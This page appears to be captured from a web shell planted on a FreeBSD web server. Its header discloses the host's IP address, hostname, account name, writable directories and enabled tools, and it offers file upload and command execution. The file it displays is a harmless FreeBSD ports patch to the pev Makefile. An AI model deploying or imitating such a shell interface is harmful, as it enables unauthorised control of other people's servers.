403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/security/pev/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/security/pev/files/patch-src_Makefile
--- src/Makefile.orig	2017-01-07 22:34:07 UTC
+++ src/Makefile
@@ -24,7 +24,7 @@ docdir = $(datarootdir)/doc/pev
 infodir = $(datarootdir)/info
 localedir = $(datarootdir)/locale
 
-mandir = $(datarootdir)/man
+mandir = $(prefix)/man
 manext = .1
 man1dir = $(mandir)/man1
 man1ext = .1
@@ -52,7 +52,7 @@ endif
 
 ####### Compiler options
 
-override LDFLAGS += -L$(LIBPE) -lpe -ldl
+override LDFLAGS += -L$(LIBPE) -lpe
 override CFLAGS += -I$(LIBPE) -I"../include" -W -Wall -Wextra -std=c99 -pedantic
 override CPPFLAGS += -D_GNU_SOURCE -DSHAREDIR="\"$(SHAREDIR)"\"
 
@@ -153,6 +153,17 @@ install: installdirs
 	$(INSTALL_DATA) $(srcdir)/userdb.txt $(DESTDIR)$(SHAREDIR)
 	cd $(PLUGINS_DIR) && $(MAKE) $@
 
+install-strip: installdirs
+	for prog in $(PROGS); do \
+		$(INSTALL_PROGRAM) -s $(pev_BUILDDIR)/$$prog $(DESTDIR)$(bindir); \
+		$(CHK_FILE_EXISTS) $(MANDIR)/$$prog$(man1ext) && \
+			gzip -c -9 $(MANDIR)/$$prog$(man1ext) > $(DESTDIR)$(man1dir)/$$prog$(man1ext).gz || \
+			echo -n; \
+	done
+
+	$(INSTALL_DATA) $(srcdir)/userdb.txt $(DESTDIR)$(SHAREDIR)
+	cd $(PLUGINS_DIR) && $(MAKE) $@
+
 installdirs:
 	@$(CHK_DIR_EXISTS) $(DESTDIR) || $(MKDIR) $(DESTDIR)
 	@$(CHK_DIR_EXISTS) $(DESTDIR)$(bindir) || $(MKDIR) $(DESTDIR)$(bindir)

Youez - 2016 - github.com/yon3zu
LinuXploit